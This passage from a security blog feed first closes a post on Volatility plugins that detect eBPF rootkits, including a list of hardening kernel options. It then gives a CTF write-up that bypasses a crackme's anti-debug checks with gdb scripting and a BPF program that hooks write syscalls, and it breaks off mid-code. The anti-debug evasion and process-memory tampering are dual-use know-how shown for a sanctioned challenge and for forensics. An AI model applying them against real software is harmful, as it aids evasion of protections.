2021 paper</a>. Apart from a plugin that lists programs by parsing the <code class="language-plaintext highlighter-rouge">prog_idr</code>, they have also implemented several plugins that can find BPF programs by analyzing the data structures of the attachment mechanisms they use, such as kprobes, tracepoints or perf events. Thus, their plugins are also able to discover inconsistencies that could reveal anti-forensic tampering. However, they have never publicly released their plugins and despite several attempts we have been unable to contact the authors to obtain a copy of the source code. Volatility already supports detecting BPF programs attached to sockets in its <a href="https://github.com/volatilityfoundation/volatility3/blame/develop/volatility3/framework/plugins/linux/sockstat.py#L163"><code class="language-plaintext highlighter-rouge">sockstat</code></a> plugin. The displayed information is limited to names and IDs.</p>

<p><strong>Reverse Engineering</strong>: Reverse engineering BPF programs is a key step while triaging the findings of our plugins. Recently, the <a href="https://github.com/NationalSecurityAgency/ghidra">Ghidra</a> software reverse engineering (SRE) suite gained <a href="https://github.com/NationalSecurityAgency/ghidra/pull/4258">support for the BPF architecture</a>, which means that its powerful decompiler can be used to analyze BPF bytecode extracted from kernel memory or user-space programs. Furthermore, BPF bytecode is oftentimes embedded into user-space programs that use framework libraries to load it into the kernel at runtime. For programs written in the Go programming language, <a href="https://github.com/Gui774ume/ebpfkit-monitor">ebpfkit-monitor</a> can parse the binary format of these embedded files to list the defined programs and maps as well as their interactions. It uses this information to generate graphs that are similar to those of our <code class="language-plaintext highlighter-rouge">bpf_graph</code> plugin. Although the utility of these graphs has inspired our plugin, it is fundamentally different in that it displays information about the state of the kernel’s BPF subsystem extracted from a memory image. Consequently, it is inherently agnostic to the user-space framework that was used for compiling and loading the programs. Additionally, it displays the actual state of the BPF subsystem instead of the BPF objects that might be created by an executable at runtime.</p>

<p><strong>Runtime Protection and Monitoring</strong>: Important aspects of countering BPF malware are preventing attackers from loading malicious BPF programs and logging suspicious events for later review. <a href="https://github.com/Gui774ume/krie">krie</a> and <a href="https://github.com/Gui774ume/ebpfkit-monitor">ebpfkit-monitor</a> are tools that can be used to log BPF-related events as well as to deny processes access to the BPF system call.</p>

<p>Simply blocking access on a per-process basis is too course-grained for many applications and thus <a href="https://medium.com/@yunwei356/the-secure-path-forward-for-ebpf-runtime-challenges-and-innovations-968f9d71fc16">multiple approaches were proposed</a> to implement a more fine-grained access control model for the BPF subsystem to facilitate the realization of least privilege policies. Among those, one can further distinguish between proposals that implement access control in user space, kernel space, or a hypervisor.</p>

<p><a href="https://bpfman.io/main/"><code class="language-plaintext highlighter-rouge">bpfman</code></a> (formerly known as bpfd) is a privileged user space daemon that acts as proxy for loading BPF programs and can be used to implement different access control policies. A combination of a privileged user-space daemon and kernel changes is used in the proposed <a href="https://lwn.net/Articles/947173/">BPF token approach</a> that allows delegation of access to specific parts of the BPF subsystem to container processes by a privileged daemon.</p>

<p>A fine-grained in-kernel access control is offered by the <a href="https://dl.acm.org/doi/abs/10.5555/3620237.3620571">CapBits</a> proposed by Yi He et al. Here, two bitfields are added to the <code class="language-plaintext highlighter-rouge">task_struct</code>, where one defines the access that a process has to the BPF subsystem, e.g., allowed program types and helpers, and the other restricts the access that BPF programs can have on the process, e.g., to prevent it from being traced by kprobe programs. Namespaces are already used in many areas of the Linux kernel to virtualize global resources like PIDs or network devices. Thus, Y. <a href="https://lwn.net/Articles/927354/">Shao proposed introducing BPF namespaces</a> to limit the scope of loaded programs to processes inside of the namespace. Finally, <a href="https://www.youtube.com/watch?v=9p4qviq60z8">signatures over programs</a> are a mechanism that allows the kernel to verify their provenance, which can be used analogous to module signatures that prevent attackers from loading malicious kernel modules.</p>

<p>Lastly, Y. Wang et al. <a href="https://dl.acm.org/doi/10.1145/3609021.3609305">proposed</a> moving large parts of the BPF VM from the kernel into a hypervisor, where they implement a multi-step verification process that includes enforcing a security policy, checking signatures, and scanning for known malicious programs. In the security policy, allowed programs can be specified as a set of deterministic finite automata, which allows for accepting dynamically generated programs without allowing for arbitrary code to be loaded.</p>

<p>All these approaches are complementary to our plugins as they focus on reducing the chance that an attacker can successfully load a malicious program, while we assume that this step has already happened and aim to detect their presence.</p>

<h2 id="conclusion">Conclusion</h2>

<p>In this post, we gave an introduction to the Linux BPF subsystem and discussed its potential for abuse. We then presented seven Volatility plugins that allow investigators to detect BPF malware in memory images and evaluated them on multiple versions of popular Linux distributions. To conclude the post, we will briefly discuss related projects we are working on and plans for future work.</p>

<p>This project grew out of the preparation of a <a href="https://web.archive.org/web/20230323233100/https://dfrws.org/forensic-analysis-of-ebpf-based-linux-rootkits/">workshop</a> on BPF rootkits at the DFRWS EU 2023 annual conference (<a href="https://github.com/vobst/bpf-rootkit-workshop">materials</a>). We began working on this topic because we believe that the forensic community needs to expand its toolbox in response to the rise of BPF in the Linux world to fill blind spots in existing analysis methods. Additionally, investigators who may encounter BPF in their work should be made aware of the potential relevance of the subsystem to their investigation.</p>

<p>While the workshop, our plugins, and this post are an important step towards this goal, much work remains to be done. First, in order for the present work to be useful in the real world our next goal must be to upstream most of it into the Volatility 3 project. Only this will ensure that investigators all around the world will be able to easily find and use it. This will require:</p>

<ul>
  <li>Refactoring of our utility code to use Volatility 3’s extension class mechanism</li>
  <li>The <code class="language-plaintext highlighter-rouge">bpf_graph</code> plugin relies on <a href="https://networkx.org/documentation/stable/reference/algorithms/index.html">networkx</a>, which is not yet a dependency of Volatility 3. If the introduction of a new dependency into the upstream project is not feasible, one could make it optional by checking for the presence of the package within the plugin.</li>
  <li>Additional testing on older kernel versions and kernels with diverse configurations to meet Volatility’s high standards regarding compatibility</li>
</ul>

<p>We will be happy to work with upstream developers to make the integration happen.</p>

<p>Furthermore, there remains the problem of dealing with the wide variety of map types when extracting their contents, as well as the related problem of pretty-printing them using BTF information. Here, we consider a manual implementation approach to be impractical and would explore the possibility of using emulation of the relevant functions.</p>

<p>Regarding the advanced analysis aimed at countering anti-forensics, we have also implemented consistency checks against the lists of kprobes and tracepoints, but these require further work to be ready for publication. We also described additional analyses in our workshop that still need to be implemented.</p>

<p>Finally, an interesting side effect of the introduction of BPF into the Linux kernel is that most of the functionality requires BTF information for the kernel and modules to be available. This provides an easy solution to the problem of obtaining type information from a raw memory image, a step that is central to automatic profile generation. We have already shown that it is possible to reliably extract BTF sections from memory images by implementing a <a href="https://github.com/vobst/BPFVol3/blob/extractbtf/src/plugins/btf_extract.py">plugin</a> for that. We have also explored the possibility of combining this with existing approaches for extracting symbol information in order to obtain working profiles from a dump. While the results are promising, further work is needed to have a usable solution.</p>

<h2 id="appendix">Appendix</h2>

<h3 id="a-kernel-configuration">A: Kernel Configuration</h3>

<p>This section provides a list of compile-time kernel configuration options that can be adjusted to restrict the capabilities of BPF programs. In general, it is recommended to disable unused features in order to reduce the attack surface of a system.</p>

<ul>
  <li><a href="https://elixir.bootlin.com/linux/v6.1.68/source/kernel/bpf/Kconfig#L26"><code class="language-plaintext highlighter-rouge">BPF_SYSCALL=n</code></a>: Disables the BPF system call. Probably breaks most systemd-based systems.</li>
  <li><a href="https://elixir.bootlin.com/linux/v6.1.68/source/lib/Kconfig.debug#L345"><code class="language-plaintext highlighter-rouge">DEBUG_INFO_BTF=n</code></a>: Disables generation of BTF debug information, i.e., CORE no longer works on this system. Forces attackers to compile on/for the system they want to compromise.</li>
  <li><a href="https://elixir.bootlin.com/linux/v6.1.68/source/kernel/bpf/Kconfig#L90"><code class="language-plaintext highlighter-rouge">BPF_LSM=n</code></a>: BPF programs cannot be attached to LSM hooks.</li>
  <li><a href="https://elixir.bootlin.com/linux/v6.1.67/source/security/lockdown/Kconfig#L33"><code class="language-plaintext highlighter-rouge">LOCK_DOWN_KERNEL_FORCE_INTEGRITY=y</code></a>: Prohibits the use of <code class="language-plaintext highlighter-rouge">bpf_probe_write_user</code>.</li>
  <li><a href="https://www.kernelconfig.io/CONFIG_NET_CLS_BPF?q=NET_CLS_BPF&amp;kernelversion=6.6.6&amp;arch=x86"><code class="language-plaintext highlighter-rouge">NET_CLS_BPF=n</code></a> and <a href="https://www.kernelconfig.io/CONFIG_NET_ACT_BPF?q=CONFIG_NET_ACT_BPF&amp;kernelversion=6.6.6&amp;arch=x86"><code class="language-plaintext highlighter-rouge">NET_ACT_BPF=n</code></a>: BPF programs cannot be used in TC classifier actions. Stops some data exfiltration techniques.</li>
  <li><a href="https://elixir.bootlin.com/linux/v6.1.67/source/lib/Kconfig.debug#L1880"><code class="language-plaintext highlighter-rouge">FUNCTION_ERROR_INJECTION=n</code></a>: Disables the function error injection framework, i.e., BPF programs can no longer use <code class="language-plaintext highlighter-rouge">bpf_override_return</code>.</li>
  <li><a href="https://elixir.bootlin.com/linux/v6.1.68/source/net/netfilter/Kconfig#L1168"><code class="language-plaintext highlighter-rouge">NETFILTER_XT_MATCH_BPF=n</code></a>: Disables option to use <a href="https://blog.cloudflare.com/programmable-packet-filtering-with-magic-firewall/">BPF programs in nftables rules</a>. Could be used to implement malicious firewall rules.</li>
  <li><a href="https://elixir.bootlin.com/linux/v6.1.68/source/kernel/trace/Kconfig#L696"><code class="language-plaintext highlighter-rouge">BPF_EVENTS=n</code></a>: Removes the option to attach BPF programs to kprobes, uprobes, and tracepoints.</li>
</ul>

<p>Below are options that limit features that we consider less likely to be used by malware.</p>

<ul>
  <li><a href="https://elixir.bootlin.com/linux/v6.1.68/source/net/bpfilter/Kconfig#L2"><code class="language-plaintext highlighter-rouge">BPFILTER=n</code></a>: This is an unfinished BPF-based replacement of iptables/nftables (currently not functional).</li>
  <li><a href="https://elixir.bootlin.com/linux/v6.1.68/source/net/Kconfig#L397"><code class="language-plaintext highlighter-rouge">LWTUNNEL_BPF=n</code></a>: Disables the use of BPF programs for routing decisions in light weight tunnels.</li>
  <li><a href="https://elixir.bootlin.com/linux/v6.1.68/source/init/Kconfig#L1157"><code class="language-plaintext highlighter-rouge">CGROUP_BPF=n</code></a>: Disables the option to attach BPF programs to cgoups. Cgroup programs can monitor various networking-related events of processes in the group. Probably breaks most systemd-based systems.</li>
</ul>]]></content><author><name></name></author><summary type="html"><![CDATA[Have you ever wondered how an eBPF rootkit looks like? Well, here’s one, have a good look:]]></summary></entry><entry><title type="html">Solving Binary Gecko’s Hexacon CTF with frida and angr [stage 1, Linux]</title><link href="https://blog.eb9f.de/2023/10/20/ctf_hxn23_binary_gecko_stage_1_linux.html" rel="alternate" type="text/html" title="Solving Binary Gecko’s Hexacon CTF with frida and angr [stage 1, Linux]" /><published>2023-10-20T00:00:00+00:00</published><updated>2023-10-20T00:00:00+00:00</updated><id>https://blog.eb9f.de/2023/10/20/ctf_hxn23_binary_gecko_stage_1_linux</id><content type="html" xml:base="https://blog.eb9f.de/2023/10/20/ctf_hxn23_binary_gecko_stage_1_linux.html"><![CDATA[<p>This year’s <a href="https://www.hexacon.fr/">Hexacon</a> featured several CTFs hosted by some of the sponsoring companies. This post is a brief writeup of my solution for the stage-one Linux challenge by <a href="https://binarygecko.com/">Binary Gecko</a>, a “[…] provider of comprehensive and specialized cybersecurity solutions to businesses and institutions of all sizes.”, aha.</p>

<p>tl;dr: Work around a bunch of anti-debug techniques to dump a second-stage payload. Use <a href="https://angr.io/">angr</a> (after convincing it to load the malformatted dump) to solve a standard crackme that yields the flag. Then validate that it is correct, using <a href="https://frida.re/">frida</a> to work around some more anti-debug annoyances.</p>

<h2 id="overview">Overview</h2>
<p>We are given a static binary without any symbols or useful strings, but with an rwx segment, great. Running it just tells us to ‘Get out!’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>% readelf --segments hexalinux.bin

Elf file type is EXEC (Executable file)
Entry point 0x2000c0
There are 2 program headers, starting at offset 64

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  LOAD           0x0000000000000000 0x0000000000200000 0x0000000000200000
                 0x0000000000003a87 0x0000000000003a87  RWE    0x200000
  LOAD           0x0000000000003a87 0x0000000000a03a87 0x0000000000a03a87
                 0x0000000000004010 0x0000000000004010  RW     0x200000
% file hexalinux.bin
hexalinux.bin: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
% ./hexalinux.bin
Get out!!
</code></pre></div></div>
<p>Furthermore, throwing it into a disassembler shows many unprocessed regions, indicating some sort of packing.</p>

<h2 id="anti-debug-vol-1">Anti-Debug Vol. 1</h2>
<p>Using <code class="language-plaintext highlighter-rouge">strace</code> shows us the first anti-debug technique: the binary checks <code class="language-plaintext highlighter-rouge">/proc/self/status</code>. Usually this is a check of the “TracerPid” value to detect the presence of a debugger.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>% strace ./hexalinux.bin
execve("./hexalinux.bin", ["./hexalinux.bin"], 0x70bb0b5efd70 /* 43 vars */) = 0
getpid()                                = 34999
stat("/proc/34999/status", {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
open("/proc/34999/status", O_RDONLY)    = 3
read(3, "Name:\thexalinux.bin\nUmask:\t0022\n"..., 4095) = 1207
close(3)                                = 0
exit(0)                                 = ?
</code></pre></div></div>
<p>At this point, I went searching for a <a href="https://github.com/vobst/ctf_hxn23_binary_gecko_stage_1_linux/blob/master/gdb_script.py">gdb script</a> I use in those situations. Using <a href="https://binary.ninja/">my favorite decompiler</a>, I made a list of all the <code class="language-plaintext highlighter-rouge">syscall</code> addresses in the binary.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">[</span><span class="n">x</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="p">[[</span><span class="n">i</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">f</span><span class="p">.</span><span class="n">instructions</span> <span class="k">if</span> <span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="p">[</span><span class="mi">0</span><span class="p">][</span><span class="mi">0</span><span class="p">])</span> <span class="o">==</span> <span class="s">'syscall'</span><span class="p">]</span> <span class="k">for</span> <span class="n">f</span> <span class="ow">in</span> <span class="n">bv</span><span class="p">.</span><span class="n">functions</span><span class="p">]</span> <span class="k">if</span> <span class="n">x</span><span class="p">]</span>
</code></pre></div></div>
<p>The script simply uses them to place a breakpoint before and after each syscall instruction. Combining this with a <a href="https://github.com/martinclauss/syscall_number">tool to convert syscall numbers to names</a>, we got ourselves a poor-mans <code class="language-plaintext highlighter-rouge">strace</code>! We can also automate the bypassing of the first anti-debug check by simply overwriting the string that was read from the status file.</p>

<h2 id="anti-debug-vol-2">Anti-Debug Vol. 2</h2>
<p>Running the binary under our ad-hock <code class="language-plaintext highlighter-rouge">strace</code> shows a call to <code class="language-plaintext highlighter-rouge">fork</code> and then many <code class="language-plaintext highlighter-rouge">ptrace</code> invocations - it seems that the first process is spawning another process and then does some fun stuff to it. However, we soon exit due to some other anti-debug check.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SYS_getpid(arg1=0x0,arg2=0x0,arg3=0x0,arg4=0x0,arg5=0x0) -&gt; 0x13f2
SYS_stat(arg1=0x7fffffffd340,arg2=0x7fffffffd3c0,arg3=0x7fffffffd32f,arg4=0x7fffffffd3c0,arg5=0x0) -&gt; 0x0
SYS_open(name=0x7fffffffd340:   "/proc/5106/status",arg2=0x0,arg3=0x0,arg4=0x0,arg5=0x0) -&gt; 0x3
SYS_read(fd=0x3,buf=0x7fffffffd450,n=0xfff,arg4=0xfff,arg5=0x3) -&gt; 0x4b1
[+] remove TracerPid
SYS_close(arg1=0x3,arg2=0x7fffffffd450,arg3=0xfff,arg4=0xfff,arg5=0x0) -&gt; 0x0
[Detaching after fork from child process 5109]
SYS_fork(arg1=0x7fffffffd450,arg2=0x7fffffffd315,arg3=0x7fffffffd45b,arg4=0xfff,arg5=0x0) -&gt; 0x13f5
SYS_rt_sigaction(arg1=0x5,arg2=0x7fffffff6970,arg3=0x0,arg4=0x8,arg5=0x0) -&gt; 0x0
SYS_mmap(arg1=0x0,arg2=0x100000,arg3=0x3,arg4=0x22,arg5=0xffffffff) -&gt; 0x7ffff7ef9000
SYS_getpid(arg1=0x0,arg2=0x100000,arg3=0x3,arg4=0x22,arg5=0x0) -&gt; 0x13f2
SYS_stat(arg1=0x7fffffff6a60,arg2=0x7fffffff6d60,arg3=0x7fffffff6a1f,arg4=0x7fffffff6d60,arg5=0x0) -&gt; 0x0
SYS_open(name=0x7fffffff6a60:   "/proc/5106/status",arg2=0x0,arg3=0x0,arg4=0x0,arg5=0x0) -&gt; 0x3
SYS_read(fd=0x3,buf=0x7fffffff72d0,n=0xfff,arg4=0xfff,arg5=0x3) -&gt; 0x4b1
[+] remove TracerPid
SYS_close(arg1=0x3,arg2=0x7fffffff72d0,arg3=0xfff,arg4=0xfff,arg5=0x0) -&gt; 0x0
SYS_prctl(arg1=0x4,arg2=0x0,arg3=0x0,arg4=0x0,arg5=0x0) -&gt; 0x0
SYS_ptrace(arg1=0x4200,arg2=0x13f5,arg3=0x0,arg4=0x10005e,arg5=0x0) -&gt; 0x0
SYS_ptrace(arg1=0x7,arg2=0x13f5,arg3=0x0,arg4=0x0,arg5=0x0) -&gt; 0x0
SYS_wait4(arg1=0x13f5,arg2=0x7fffffff69ac,arg3=0x40000001,arg4=0x0,arg5=0x0) -&gt; 0x13f5
SYS_getpid(arg1=0x13f5,arg2=0x7ffff7ef9020,arg3=0x7f,arg4=0x0,arg5=0x0) -&gt; 0x13f2
SYS_stat(arg1=0x7fffffff6ae0,arg2=0x7fffffff6df0,arg3=0x7fffffff6a2f,arg4=0x7fffffff6df0,arg5=0x0) -&gt; 0x0
SYS_open(name=0x7fffffff6ae0:   "/proc/5106/status",arg2=0x0,arg3=0x0,arg4=0x0,arg5=0x0) -&gt; 0x3
SYS_read(fd=0x3,buf=0x7fffffff82d0,n=0xfff,arg4=0xfff,arg5=0x3) -&gt; 0x4b1
[+] remove TracerPid
SYS_close(arg1=0x3,arg2=0x7fffffff82d0,arg3=0xfff,arg4=0xfff,arg5=0x0) -&gt; 0x0

Program received signal SIGTRAP, Trace/breakpoint trap.
0x0000000000201496 in ?? ()
[ Legend: Modified register | Code | Heap | Stack | String ]
─────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
[!] Command 'registers' failed to execute properly, reason: [Errno 13] Permission denied: '/proc/35415/maps'
─────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
[!] Command 'dereference' failed to execute properly, reason: [Errno 13] Permission denied: '/proc/35415/maps'
───────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
     0x201489                  jne    0x201002
     0x20148f                  mov    eax, DWORD PTR [rip+0x24db]        # 0x203970
     0x201495                  int3
 →   0x201496                  add    eax, 0x1
     0x201499                  cmp    eax, DWORD PTR [rip+0x24d1]        # 0x203970
     0x20149f                  jne    0x201002
     0x2014a5                  xor    eax, eax
     0x2014a7                  call   0x2026a0
     0x2014ac                  mov    r8d, eax
───────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "hexalinux_patch", stopped 0x201496 in ?? (), reason: SIGTRAP
─────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x201496 → add eax, 0x1
</code></pre></div></div>
<p>There are two interesting things here: we cannot access the <code class="language-plaintext highlighter-rouge">/proc/self/maps</code> of the debuggee and there is a breakpoint instruction which we did not put there.</p>

<p>The reason behind the first issue is the call to <code class="language-plaintext highlighter-rouge">SYS_prctl</code> that we can see in the trace above. It is made with the <code class="language-plaintext highlighter-rouge">PR_SET_DUMPABLE</code> parameter. Apart from the obvious effect of disabling core dumps, this affects the ownership rules of the process’ proc files, which is why our debugger cannot access them anymore. I simply used the gdb script to turn the call to prctl into a call <code class="language-plaintext highlighter-rouge">SYS_close(-1)</code>, i.e., a no-op, and afterwards adjusted the return value to indicate success.</p>

<p>The second observation is more interesting. As we can see in the above trace, the process calls <code class="language-plaintext highlighter-rouge">SYS_rt_sigaction</code> to set the signal handler for the <code class="language-plaintext highlighter-rouge">SIGTRAP</code> signal to a function at <code class="language-plaintext highlighter-rouge">0x202070</code>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>00202070  int64_t sigtrap_handler()

00202070  f30f1efa           endbr64
00202074  8305f518000001     add     dword [rel data_203970], 0x1
0020207b  c3                 retn     {__return_addr}

00202080  uint64_t adbg_set_sigtrap_handler()

00202080  f30f1efa           endbr64
00202084  4883ec28           sub     rsp, 0x28
00202088  31d2               xor     edx, edx  {0x0}
0020208a  bf05000000         mov     edi, 0x5
0020208f  4889e6             mov     rsi, rsp {var_28}
00202092  48c7442418ffffff…  mov     qword [rsp+0x18 {var_10}], 0xffffffffffffffff
0020209b  48c7042470202000   mov     qword [rsp {var_28}], sigtrap_handler
002020a3  48c7442408000000…  mov     qword [rsp+0x8 {var_20}], 0x4000000
002020ac  48c7442410602020…  mov     qword [rsp+0x10 {var_18}], data_202060
002020b5  e806060000         call    sigaction
002020ba  85c0               test    eax, eax
002020bc  7805               js      0x2020c3

002020be  4883c428           add     rsp, 0x28
002020c2  c3                 retn     {__return_addr}

002020c3  31ff               xor     edi, edi  {0x0}
002020c5  e816040000         call    exit

</code></pre></div></div>
<p>Your disassembler probably did not catch that upper function on the first round, but it simply increments the memory at <code class="language-plaintext highlighter-rouge">0x203970</code> by one. The code around the breakpoint then validates that the handler runs when executing the <code class="language-plaintext highlighter-rouge">int3</code> instruction, cool. Of course the handler will not run when we are debugging, which is another thing we can fix with the script.</p>

<h2 id="anti-debug-vol-3">Anti-Debug Vol. 3</h2>

<p>Even with all these countermeasures in place, I still crashed due to an invalid memory reference. It happened at a seemingly arbitrary point while debugging the child process (before the parent attaches to it). When executing</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SYS_getpid(arg1=0x0,arg2=0x0,arg3=0x0,arg4=0x0,arg5=0x0) -&gt; 0x147a
SYS_stat(arg1=0x7fffffffd350,arg2=0x7fffffffd3d0,arg3=0x7fffffffd33f,arg4=0x7fffffffd3d0,arg5=0x0) -&gt; 0x0
SYS_open(name=0x7fffffffd350:   "/proc/5242/status"
,arg2=0x0,arg3=0x0,arg4=0x0,arg5=0x0) -&gt; 0x3
SYS_read(fd=0x3,buf=0x7fffffffd460,n=0xfff,arg4=0xfff,arg5=0x3) -&gt; 0x4b0
[+] remove TracerPid
SYS_close(arg1=0x3,arg2=0x7fffffffd460,arg3=0xfff,arg4=0xfff,arg5=0x0) -&gt; 0x0
[Attaching after process 5242 fork to child process 5245]
[New inferior 2 (process 5245)]
[Detaching after fork from parent process 5242]
[Inferior 1 (process 5242) detached]
SYS_fork(arg1=0x7fffffffd460,arg2=0x7fffffffd325,arg3=0x7fffffffd46b,arg4=0xfff,arg5=0x0) -&gt; 0x0
SYS_setrlimit(arg1=0x4,arg2=0x7fffffffd340,arg3=0x7fffffffd46b,arg4=0x7fffffffd340,arg5=0x0) -&gt; 0x0
SYS_getpid(arg1=0x7fffffffe480,arg2=0x7fffffffd340,arg3=0x7fffffffd46b,arg4=0x7fffffffd340,arg5=0x0) -&gt; 0x147d
SYS_stat(arg1=0x7fffffffd330,arg2=0x7fffffffd3b0,arg3=0x7fffffffd29f,arg4=0x7fffffffd3b0,arg5=0x0) -&gt; 0x0
SYS_open(name=0x7fffffffd330:   "/proc/5245/status",arg2=0x0,arg3=0x0,arg4=0x0,arg5=0x0) -&gt; 0x3
SYS_read(fd=0x3,buf=0x7fffffffd440,n=0xfff,arg4=0xfff,arg5=0x3) -&gt; 0x4b1
[+] remove TracerPid
SYS_close(arg1=0x3,arg2=0x7fffffffd440,arg3=0xfff,arg4=0xfff,arg5=0x0) -&gt; 0x0
SYS_setrlimit(arg1=0x4,arg2=0x7fffffffd2a0,arg3=0x7,arg4=0x7fffffffd2a0,arg5=0x0) -&gt; 0x0

Thread 2.1 "hexalinux_patch" received signal SIGBUS, Bus error.
[...]
$rbp   : 0x89a770da45244a2e
[...]
 →   0x2003be                  mov    eax, DWORD PTR [rbp+0x0]
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">rbp</code> was always holding some garbage value. At this point I got kind of annoyed and started patching the code, however, this only increased my dissatisfaction as it turned out that the binary detects code modifications and gets trapped in an endless loop, charming.</p>

<p>I did not investigate these two issues further, but one of the other two (yea, there are more) anti-debug measures performed by the child lead me on the right track.</p>

<h2 id="anti-debug-vol-4">Anti-Debug Vol. 4</h2>

<p>The first thing that the child does is setting the resource limit for the maximal core dump size to zero, i.e., <code class="language-plaintext highlighter-rouge">SYS_setrlimit(0x4...)</code>. That’s not a problem as we can bypass it by turning it into a no-op <code class="language-plaintext highlighter-rouge">close(-1)</code> via the debugger. However, the second activity is more interesting: the child sanitizes its environment variables on the stack, removing some variables interpreted by the <a href="https://man7.org/linux/man-pages/man8/ld.so.8.html">dynamic linker</a> … interesting: why care about those variables in a static binary?</p>

<p><em>Aside</em>: (I guess) that there is a bug when sanitizing the stack:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>00202100  char** adbg_sanitize_env(void* argcp)

00202100  f30f1efa           endbr64
00202104  53                 push    rbx {__saved_rbx}
00202105  488d4708           lea     rax, [rdi+0x8]
00202109  4883ec20           sub     rsp, 0x20
0020210d  0f1f00             nop     dword [rax], eax

00202110  4889c2             mov     rdx, rax
00202113  4883c008           add     rax, 0x8
00202117  48833800           cmp     qword [rax], 0x0
0020211b  75f3               jne     0x202110
...
</code></pre></div></div>
<p>Since <code class="language-plaintext highlighter-rouge">rdi</code> points to points to <code class="language-plaintext highlighter-rouge">argc</code>, the first loop, which is meant to skip the argument vector <code class="language-plaintext highlighter-rouge">argv</code>, actually skips the environment variables when the program is executed with no arguments at all (yes, <code class="language-plaintext highlighter-rouge">argv[0]</code> is optional).</p>

<h2 id="change-of-strategy">Change of Strategy</h2>

<p>As it didn’t look like I could debug either parent or child with any meaningful results, and reversing the binary statically didn’t look fun either, (especially due do the poking of the parent via ptrace that makes it hard to reason about the child’s control flow, some obvious second stage unpacking, and potentially self-modifying code) I decided to switch tracks.</p>

<p>Remember that the binary printed “Get out!” to stdout? The disassembly I was looking at did not even contain a write system call! At first, I was suspecting that the <code class="language-plaintext highlighter-rouge">write</code> syscall would be made from shellcode, so I wrote a <a href="https://github.com/vobst/ctf_hxn23_binary_gecko_stage_1_linux/blob/master/hexalinux.bpf.c">small BPF program</a> that hooks the write syscall and overwrite the code after the syscall instruction with an endless loop, i.e., <code class="language-plaintext highlighter-rouge">jmp 0x0</code>. This would allow me to inspect whichever process made the syscall, or at least I hoped so.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">SEC</span><span class="p">(</span><span class="s">"tp/syscalls/sys_enter_write"</span><span class="p">)</span>
<span class="kt">int</span> <span class="nf">tp_sys_enter_write</span><span class="p">(</span><span class="k">struct</span> <span class="n">trace_event_raw_sys_exit</span><span class="o">*</span> <span class="n">tp</span><span class="p">)</span>
<span class="p">{</span>
  <span class="k">struct</span> <span class="n">task_struct</span><span class="o">*</span> <span class="n">task</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
  <span class="k">struct</span> <span class="n">pt_regs</span><span class="o">*</span> <span class="n">regs</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
  <span class="kt">int</span> <span class="n">argc</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="n">ret</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
  <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">16</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
  <span class="kt">void</span> <span class="o">*</span><span class="n">ip</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

  <span class="c1">// only hook child and parent</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">bpf_get_current_comm</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">buf</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">buf</span><span class="p">)))</span> <span class="p">{</span>
    <span class="n">bpf_printk</span><span class="p">(</span><span class="s">"error: bpf_get_current_comm</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
  <span class="p">}</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">__builtin_memcmp</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="s">"hexalinux"</span><span class="p">,</span> <span class="mi">9</span><span class="p">))</span> <span class="p">{</span>
    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
  <span class="p">}</span>

  <span class="c1">// get address of insn after `syscall`</span>
  <span class="n">task</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">task_struct</span><span class="o">*</span><span class="p">)</span><span class="n">bpf_get_current_task_btf</span><span class="p">();</span>
  <span class="n">regs</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">pt_regs</span><span class="o">*</span><span class="p">)</span><span class="n">bpf_task_pt_regs</span><span class="p">(</span><span class="n">task</span><span class="p">);</span>
  <span class="n">ip</span> <span class="o">=</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">BPF_CORE_READ</span><span class="p">(</span><span class="n">regs</span><span class="p">,</span> <span class="n">ip</span><span class="p">);</span>

  <span class="n">bpf_printk</span><span class="p">(</span><span class="s">"IP: 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">ip</span><span class="p">);</span>

